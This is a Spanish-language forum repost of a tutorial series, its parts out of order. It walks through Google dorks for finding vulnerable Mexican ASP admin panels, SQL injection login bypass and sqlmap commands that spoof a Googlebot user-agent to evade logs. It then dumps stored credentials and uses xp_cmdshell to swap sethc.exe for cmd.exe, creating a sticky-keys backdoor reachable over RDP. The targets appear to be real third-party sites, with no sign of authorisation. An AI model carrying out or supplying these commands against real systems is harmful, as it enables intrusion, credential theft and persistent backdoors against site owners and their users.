En la parte anterior vimos lo siguiente:

     Exploit para MySQL vulnerable.
     Como saber los usuarios que hay en la base de datos en la que estamos trabajando con Sqlmap.
     Saber los privilegios de esos usuarios.
     Conocer que usuario somos en la base de datos.
     Averiguar si somos Administradores de la base de datos.

Continuemos.
Sabemos que somos un usuario con privilegios y que somos dba (data base admin).



y que podemos ejecutar comandos con xp_cmdshell



omo podemos ver tiene abierto el puerto 3389 osea el puerto de administracion remota de windows

Ya sabemos que no podemos:

     Subir una webshell.
     Penetrar mediante Metasploit.



Entonces usemos nuestra imaginación de Hacker's, pensemos que podemos hacer para poder explotar ese puerto y obtener acceso al servidor, tiene que ser algo que no implique exploits que inyecten código ya que no funciona (En este caso).



No se les ocurre nada??

Pues les mostrare una manera fácil y sencilla dado nuestro caso.

Aprovecharemos Sqlmap para entrar..., ¿¿sqlmap?? ¿¿Pero ya hicimos eso no??.

Pues si y no.
Realizamos el SQLi, pero ahora lo que haremos sera utilizar xp_cmdshell. Vamos.

Primero les enseñare algo que ocurre en el servidor.

En el sistema Windows cuando pulsas repetidas veces la tecla Shift o Mayus aparece un mensaje.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Presione Shift 5 veces seguidas



Ese es el archivo ejecutable que abre ese dialogo, entonces aprovecharemos eso para entrar al sevidor.

Vamos a la consola y con el comando

rdesktop IPdelServidor

Nos conectaremos a el mediante el puerto 3389.



y 5 Shift's o Mayus despues...



Muy bien funciona como debería. Ahora a explotarlo >:}

Volvemos a Sqlmap y ejecutemos lo siguiente con xp_cmdshell:

sqlmap -u http://www.sitiovulnerable.mx/login.asp –forms –dbms=MSSQL –user-agent="Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)"  –level=5 –risk=3 –os-cmd='Copy "c:\windows\system32\sethc.exe" "c:\windows\system32\sethc.zzz"'

Copiara el archivo sethc.exe que esta en "C:/windows/system32/" a esa misma carpeta pero a un archivo llamado sethc.zzz veamos.



Muy bien ahora otro comando.

sqlmap -u http://www.sitiovulnerable.mx/login.asp –forms –dbms=MSSQL –user-agent="Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)"  –level=5 –risk=3 –os-cmd='Copy "c:\windows\system32\cmd.exe" "c:\windows\system32\sethc.exe"'

De nuevo expliquemos.

–os-cmd='Copy "c:\windows\system32\cmd.exe" "c:\windows\system32\sethc.exe"'

Copiara de la carpeta "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta" el archivo cmd.exe a esa misma carpeta pero con el nombre sethc.exe ya entendieron

Hola Hackers.

Continuando con nuestro pentest anterior resumimos lo siguiente:


  1.- Aprendimos un poco sobre Dorks.
  2.- Como podríamos pensar como Hackers.
  3.- Formular nuestros Dork's.
  4.- Encontrar nuestra pagina vulnerable.


Muy bien ya aclarado eso vamos a lo siguiente. Creo que si esta leyendo esto es porque estas interesado en el tema, así que si por alguna razón te trabas o no entiendes algo lo buscaras por tu cuenta (ya sabes como buscar  ) entonces no entrare en el dilema de toda la vida.


"Debes saber como funcionan las cosas"


Si, eso esta mas que claro, porque existen personas que creen que no se deberían de usar las herramientas hasta que se aprende a hacer las cosas de forma manual pero quien soy yo para decirles que hacer y que no hacer  el punto es que comenzaremos a utilizar la herramienta SQLMAP y algunos de sus comandos u opciones de uso

Yo trabajare en el sistema Kali Linux 2.0 el cual es un sistema operativo basado en Debian. Si usan Wind0$ les dejo un link de como instalar SQLMAP.

Vamos pues.



Tenemos nuestro sitio por lo tanto nuestra url y nuestro panel de ingreso.


Existen dos formas de hacer una SQLi método POST en SQLMAP.
Tenemos nuestro sitio por lo tanto nuestra url y nuestro panel de ingreso.

La primera tendría una forma más o menos así:

sqlmap -u "http://www.sitiovulnerable.com/login.asp" –method=POST –data="usr=&pass=" -p usr –dbs

pero en versiones recientes de SQLMAP esto a sido reemplazado por un solo parámetro, comando u opción (como le quieran llamar ).

pero en versiones recientes de SQLMAP esto a sido reemplazado por un solo parámetro, comando u opción (como le quieran llamar  ).

sqlmap -u http://www.sitiovulnerable.com/login.asp –forms –dbs

Es mejor no??
Nosotros usaremos la segunda

sqlmap -u http://www.paginavulnerable.mx/login.asp –forms –dbms=MSSQL –user-agent="Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)"  –level=5 –risk=3 –dbs

ahahaha D:

Pero si dijimos que usaríamos la segunda no ??

un así estamos usando la segunda pero con un poco mas de precaución veamos uno por uno los comando.

    -u = indica la URL o dirección web
    –forms = le indica a SQLMAP que busque los formularios de dicha dirección y extraiga lo que pasarían a ser los datos o consultas que enviaremos en método POST.
    –dbms = El tipo de sistema que administra la base de datos en este caso MicrosoftSqlServer recuerdan??



Atención aquí a esto me refería con precaución.

    –user-agent = sencillo, al usar SQLMAP para nuestras pruebas los servidores guardan en sus logs todo lo que sucede desde una visita y si claro hasta las consultas de SQLMAP. La misma web de sqlmap nos lo dice



así que para no levantar tantas sospechas a un admin bien listo, pues haremos que nuestro Amigo Google nos ayude (

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta), lo que hacemos es utilizar a Google, nos disfrazamos como si fuésemos el mismo haciendo peticiones a la pagina atacada.

–level = El numero de pruebas que realizara Sqlmap.
–risk = El riesgo de pruebas que realizara Sqlmap.
–dbs = Que obtenga las Bases de datos


Ven lo que les dije primero busca formularios, después encuentra el primero y por ultimo nos pregunta como lo queremos hacer y que queremos hacer con ese formulario.

Veamos que resultados nos dio >

Vaya tiene 30 bases de datos podríamos probar una por una hasta encontrar el usuario y contraseña o mejor aun hacer un –dump-all ...

Pero seria muy tardado mejor intentemos con este comando.

–current-db
Lo que hará este comando será darnos el nombre de la base de datos sobre la cual esta trabajando la inyección.



Ya esta bueno pues ahora saquemos el usuario y la contraseña.

sqlmap -u http://www.sitiovulnerable.mx/login.asp –forms –dbms=MSSQL –user-agent="Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html)"  –level=5 –risk=3 -D baseDeDatos -T Usuario –columns

Muy bien ahora vaciemos los datos.

sqlmap -u http://www.sitiovulnerable.mx/login.asp –forms –dbms=MSSQL
–user-agent="Mozilla 5 (compatible , Googlebot/2.1,
http://www.google.com/bot.html)"  –level=5 –risk=3 -D baseDeDatos -T
Usuario –columns –dump

Ok ya tenemos las credenciales de inicio  ;)ya tenemos casi todo jajaja.

Regresemos al panel de admin y ingresemos los datos.




:O entramos !!!
Bueno eso es todo en esta parte hacker's pero nos leemos la próxima donde enfrentaremos algo mas que SQLi, ya que lo siguiente es subir una shell a la web para poder hacer más cosas.

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Saludos Hacker's.

Hola a todos en estos posts voy a explicarles como realizar un ataque de SQLI y asta donde se puede llegar ...
Primero debes encontrar donde realizar la inyección es obvio no? jaja
bueno pues para esta tarea haremos una búsqueda atraves de Google con los Famosos Google dork's
Todos conocemos el famoso dork:
1. inurl:index.php?id=

Pero sabemos que no es nada genial hacerlo ya que son conocimiento que, si bien son necesarios adquirirlos no te harán un buen pentester. Ahora te orientare en el camino de formular tus propios Dork's.Ok bueno imaginemos que quieres auditar paginas de México, concretamente de Aguascalientes, que son de reclutamiento de personal (Recursos Humanos), que están diseñadas en lenguaje PHP y que además estan publicadas por un usuario llamado "admin".
Entonces la consulta la tendrías que formular de tal manera que Google te diera solo los resultados que tu deseas. Algo mas o menos así:

site:"mx" AND intext:"Estado de Aguascalientes" OR "Aguascalientes" OR "Ags" AND "Recursos Humanos" filetype:php AND intext:"posted by Admin"

Lo que nos redujo la lista a 6 resultados, porque especificamos la busqueda.
Ahora supongamos que queremos ampliarnos un poco más no solo del estado de Aguascalientes, en lugar de eso queremos que no encuentre una forma fácil de subir una WebShell.
Entonces nuestra consulta debería de:
1.- Darnos sitios de México.
   2.- Que sea una web de Recursos Humanos.
   3.- Que este diseñada en PHP.
   4.- Que tenga un Admin 
   5.- Y que nos deje subir fácilmente subir una WebShell.
Lo que nos pone a pensar como formulo esa consulta, :/   ya se como buscar los puntos 1,2,3 y 4  ... Pero como consulto el numero 5??? 
Pues bien a eso me refiero cuando les digo "pensar como Hacker".

Pensemos entonces:

¿Que tienen las web's de recursos humanos que me faciliten esa tarea :/ ?
Oo si !!! ya lo tenemos tienen formularios para subir C.V. lo que nos da una idea de como atacar con Google Dorks :
Entonces seria mas o menos así:

Sube tu Curriculum site:mx intext:"Admin" -filetype:asp -occ



Analicemos la consulta:

1.- Sube tu Curriculum: lo usamos como busquena simple sin dork o ayuda es como normalmente lo hacemos.
2.- site:mx : obviamente sitios que sean o contengan el dominio "mx"
3.- intext:Admin : que haya un usuario Admin

Aquí hay algo interesante veamos.
-filetype:asp y -occ

4.- "-filetype:asp" : nos indica que no queremos incluir ningun resultado que contenga ese tipo de archivo osea nos muestra solo los "PHP" .
5.- "-occ" : no queremos que nos muestre resultados que contengan esa palabra que es una web de Empleos.



Algo que debemos saber es que los dorks tienes una manera peculiar de comportarse debido a que Google realiza filtros para no realizar la búsqueda como quieres esto debido a que identifica tus intenciones > (te están vigilando jaja), ya que sabemos que estas búsquedas son utilizadas mayormente por Hackers

AHORA SI VAMOS A EL TEMA

Una disculpa si los hice esperar un poco, pero considere necesario que supieran eso ya que formularemos un Dork parecido a los anteriores para encontrar nuestra Web donde realizaremos SQLi.

Entonces vamos queremos hacer una Inyección SQL en una pagina donde:

   1.- El lenguaje de programación sea asp o aspx
   2.- Sea de tipo inyección de tipo POST
   3.- Sea en el Panel de Admin
   4.- Sea de Mexico o con el Dominio "mx"

Entonces formulo en siguiente Dork:
 
inurl:"/panel OR /admin OR /cpan/ OR /login OR /administrador"  filetype:asp site:mx

En esta ocasión solo mostrare el primer resultado:



Muy bien tenemos nuestro sitio para nuestras pruebas. Entremos a ver que tal luce >.



Bien ahora comprobemos si es vulnerable >
Una simple comilla como esta   '
y sabremos todo



Se los dije  pero intentemos algo mas una sentencia o consulta de SQL ; por supuesto la vieja y conocida '="OR'



Baya si que es vulnerable > lo que hace esa consulta sin demorarnos tanto y sencillamente explicado es algo mas o menos asi:


Oye base de datos de esta web quiero que me dejes entrar a esta web si el:

"usuario" = "admin"
     
y la

"contraseña" = "123456"

o si

"nada" = "nada" o a "nada"


Bueno aqui termina la primera parte , aclaro que estos posts no son de mi autoria pero , me parecio un buen aporte para la comunidad 
Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta